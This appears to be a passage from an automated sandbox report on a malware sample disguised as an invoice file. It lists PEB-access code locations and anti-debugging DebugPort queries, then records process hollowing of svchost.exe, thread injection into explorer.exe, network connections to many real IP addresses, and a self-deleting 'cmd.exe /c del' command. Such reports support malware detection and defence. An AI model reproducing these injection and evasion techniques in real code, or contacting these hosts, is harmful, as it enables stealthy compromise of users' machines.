Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96BD08 mov eax, dword ptr fs:[00000030h]	8_2_1E96BD08
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E948D0A mov eax, dword ptr fs:[00000030h]	8_2_1E948D0A
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AFD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8AFD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov ecx, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h]	8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h]	8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h]	8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h]	8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]	8_2_1E8CDD4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]	8_2_1E8CDD4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CDD4D mov eax, dword ptr fs:[00000030h]	8_2_1E8CDD4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A9D46 mov eax, dword ptr fs:[00000030h]	8_2_1E8A9D46
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A9D46 mov eax, dword ptr fs:[00000030h]	8_2_1E8A9D46
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A9D46 mov ecx, dword ptr fs:[00000030h]	8_2_1E8A9D46
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931D5E mov eax, dword ptr fs:[00000030h]	8_2_1E931D5E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92CD40 mov eax, dword ptr fs:[00000030h]	8_2_1E92CD40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92CD40 mov eax, dword ptr fs:[00000030h]	8_2_1E92CD40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984D4B mov eax, dword ptr fs:[00000030h]	8_2_1E984D4B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E975D43 mov eax, dword ptr fs:[00000030h]	8_2_1E975D43
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E975D43 mov eax, dword ptr fs:[00000030h]	8_2_1E975D43
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1D50 mov eax, dword ptr fs:[00000030h]	8_2_1E8B1D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1D50 mov eax, dword ptr fs:[00000030h]	8_2_1E8B1D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C5D60 mov eax, dword ptr fs:[00000030h]	8_2_1E8C5D60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E956D79 mov esi, dword ptr fs:[00000030h]	8_2_1E956D79
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E935D60 mov eax, dword ptr fs:[00000030h]	8_2_1E935D60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E985D65 mov eax, dword ptr fs:[00000030h]	8_2_1E985D65
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBD71 mov eax, dword ptr fs:[00000030h]	8_2_1E8EBD71
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBD71 mov eax, dword ptr fs:[00000030h]	8_2_1E8EBD71
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ABA80 mov eax, dword ptr fs:[00000030h]	8_2_1E8ABA80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E966A80 mov eax, dword ptr fs:[00000030h]	8_2_1E966A80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E957ABE mov eax, dword ptr fs:[00000030h]	8_2_1E957ABE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]	8_2_1E8E9ABF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]	8_2_1E8E9ABF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E9ABF mov eax, dword ptr fs:[00000030h]	8_2_1E8E9ABF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96DAAF mov eax, dword ptr fs:[00000030h]	8_2_1E96DAAF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0ACE mov eax, dword ptr fs:[00000030h]	8_2_1E8C0ACE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0ACE mov eax, dword ptr fs:[00000030h]	8_2_1E8C0ACE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AFAEC mov edi, dword ptr fs:[00000030h]	8_2_1E8AFAEC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0AED mov eax, dword ptr fs:[00000030h]	8_2_1E8B0AED
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0AED mov eax, dword ptr fs:[00000030h]	8_2_1E8B0AED
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0AED mov eax, dword ptr fs:[00000030h]	8_2_1E8B0AED
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]	8_2_1E8D0AEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]	8_2_1E8D0AEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D0AEB mov eax, dword ptr fs:[00000030h]	8_2_1E8D0AEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E930AFF mov eax, dword ptr fs:[00000030h]	8_2_1E930AFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E930AFF mov eax, dword ptr fs:[00000030h]	8_2_1E930AFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E930AFF mov eax, dword ptr fs:[00000030h]	8_2_1E930AFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B9AE4 mov eax, dword ptr fs:[00000030h]	8_2_1E8B9AE4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984AE8 mov eax, dword ptr fs:[00000030h]	8_2_1E984AE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h]	8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EAA0E mov eax, dword ptr fs:[00000030h]	8_2_1E8EAA0E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EAA0E mov eax, dword ptr fs:[00000030h]	8_2_1E8EAA0E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93DA31 mov eax, dword ptr fs:[00000030h]	8_2_1E93DA31
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96DA30 mov eax, dword ptr fs:[00000030h]	8_2_1E96DA30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h]	8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DDA20 mov edx, dword ptr fs:[00000030h]	8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1A24 mov eax, dword ptr fs:[00000030h]	8_2_1E8B1A24
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1A24 mov eax, dword ptr fs:[00000030h]	8_2_1E8B1A24
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7A30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7A30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7A30 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7A30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934A57 mov eax, dword ptr fs:[00000030h]	8_2_1E934A57
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934A57 mov eax, dword ptr fs:[00000030h]	8_2_1E934A57
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E9A48 mov eax, dword ptr fs:[00000030h]	8_2_1E8E9A48
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E9A48 mov eax, dword ptr fs:[00000030h]	8_2_1E8E9A48
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DEA40 mov eax, dword ptr fs:[00000030h]	8_2_1E8DEA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DEA40 mov eax, dword ptr fs:[00000030h]	8_2_1E8DEA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AFA44 mov ecx, dword ptr fs:[00000030h]	8_2_1E8AFA44
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93DA40 mov eax, dword ptr fs:[00000030h]	8_2_1E93DA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E94AA40 mov eax, dword ptr fs:[00000030h]	8_2_1E94AA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E94AA40 mov eax, dword ptr fs:[00000030h]	8_2_1E94AA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h]	8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h]	8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h]	8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h]	8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E931B93 mov eax, dword ptr fs:[00000030h]	8_2_1E931B93
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93DB90 mov eax, dword ptr fs:[00000030h]	8_2_1E93DB90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1B80 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1B80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E1B9C mov eax, dword ptr fs:[00000030h]	8_2_1E8E1B9C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h]	8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h]	8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h]	8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h]	8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]	8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AEBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8AEBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E956BDE mov ebx, dword ptr fs:[00000030h]	8_2_1E956BDE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E956BDE mov eax, dword ptr fs:[00000030h]	8_2_1E956BDE
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFBC0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBBC0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]	8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92FBC2 mov eax, dword ptr fs:[00000030h]	8_2_1E92FBC2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h]	8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h]	8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h]	8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h]	8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8D8BD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h]	8_2_1E8D8BD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1BE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h]	8_2_1E8C1BE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E5BE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8E5BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E5BE0 mov eax, dword ptr fs:[00000030h]	8_2_1E8E5BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E984BE0 mov eax, dword ptr fs:[00000030h]	8_2_1E984BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7BF0 mov ecx, dword ptr fs:[00000030h]	8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h]	8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F1B0F mov eax, dword ptr fs:[00000030h]	8_2_1E8F1B0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F1B0F mov eax, dword ptr fs:[00000030h]	8_2_1E8F1B0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93DB1B mov eax, dword ptr fs:[00000030h]	8_2_1E93DB1B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DEB1C mov eax, dword ptr fs:[00000030h]	8_2_1E8DEB1C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ACB1E mov eax, dword ptr fs:[00000030h]	8_2_1E8ACB1E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B8B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8B8B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]	8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8ECB20 mov eax, dword ptr fs:[00000030h]	8_2_1E8ECB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93CB20 mov eax, dword ptr fs:[00000030h]	8_2_1E93CB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93CB20 mov eax, dword ptr fs:[00000030h]	8_2_1E93CB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93CB20 mov eax, dword ptr fs:[00000030h]	8_2_1E93CB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93DB2A mov eax, dword ptr fs:[00000030h]	8_2_1E93DB2A
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EBB5B mov esi, dword ptr fs:[00000030h]	8_2_1E8EBB5B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E93FB45 mov eax, dword ptr fs:[00000030h]	8_2_1E93FB45
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96BB40 mov ecx, dword ptr fs:[00000030h]	8_2_1E96BB40
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96BB40 mov eax, dword ptr fs:[00000030h]	8_2_1E96BB40

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,

8_2_1E8F2EB0

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: zbcdidj04hd0ibmx.exe.10.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.244.144.199 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.250.120.206 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.98.5.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 44.227.76.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 50.118.200.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.68.16.57 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.23.172.127 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.237.47.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.140.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.61.153.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.2.194.128 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.212.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.82.227 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 510000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Thread register set: target process: 4580			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 4580			Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"			Jump to behavior

Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6757843283.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7072184726.0000000004BC0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6855474655.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6808498694.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7089428273.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp	Binary or memory string: Progman
